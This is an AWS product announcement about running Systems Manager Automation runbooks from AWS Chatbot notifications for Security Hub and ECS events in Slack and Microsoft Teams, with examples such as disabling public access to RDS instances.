With this launch, customers can run AWS Systems Manager automations to resolve issues when they receive AWS Security Hub and Amazon ECS event notifications in chat channels. AWS Chatbot displays contextual action buttons on Security Hub and ECS event notifications and customers can click on them to run automations to resolve the finding. For example, they can run the automation to disable public accessibility of Amazon RDS database instances or run the automation to troubleshoot why an Amazon ECS task in an Amazon ECS cluster failed to start.
Get started with using AWS Systems Manager Automation runbook recommendations in chat channels by installing the AWS Chatbot apps for Microsoft Teams and Slack. You can use AWS Systems Manager Automation runbook action recommendations at no additional cost. This feature is available in all public AWS Regions where AWS Chatbot service is offered. To learn more about custom actions in AWS Chatbot, visit the AWS Chatbot documentation or the AWS Chatbot product page.